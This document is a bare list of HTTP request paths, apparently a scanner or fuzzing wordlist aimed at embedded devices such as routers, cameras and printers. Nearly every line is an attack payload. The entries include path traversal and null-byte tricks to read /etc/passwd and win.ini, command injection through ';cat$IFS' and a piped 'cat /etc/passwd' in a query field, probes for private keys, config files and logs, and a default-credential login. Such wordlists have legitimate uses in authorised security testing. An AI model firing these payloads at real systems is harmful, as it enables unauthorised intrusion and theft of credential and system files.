/adm/file.cgi?next_file=%2fetc%2fpasswd
/../../../../../../../../../../../../../etc/passwd
/web_shell_cmd.gch
/cgi-bin/;cat$IFS/etc/passwd
/command/prima-factory.cgi
/command.cgi?cat%20/etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/action/usermanager.htm
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/../../../../../etc/passwd
/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/password.html
/conf/nginx.conf
/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd
/images/../../../../../../../../etc/passwd
/cgi-bin/cgibox?.cab
/cgi-bin/cgibox?/nobody
/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
/password.cgi
/../../etc/passwd
/self.key
/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
/request_para.cgi?parameter=wifi_get_5g_host
/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/js/../../../../../../../../etc/passwd%00.jpg
/login?login={{username}}&password={{password}}
/login?login=lutron&password=lutron
/setup.cgi?next_file=debug.htm&x=currentsetting.htm
/cgi-bin/privatekey.pem
/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/SSI/Auth/ip_snmp.htm
/hp/device/webAccess/index.htm?content=security
/wt3/forceSave.php?file=/etc/passwd
/psiBackupInfo
/adminpasswd.cgi
/lang/log/httpd.log
/portal/conf/config.properties
/Portal0000.htm
/eIMConfiguration
/eid-management
/eid-management-new
/bulk-profile-operation
/Security/users?auth={{b64auth}}
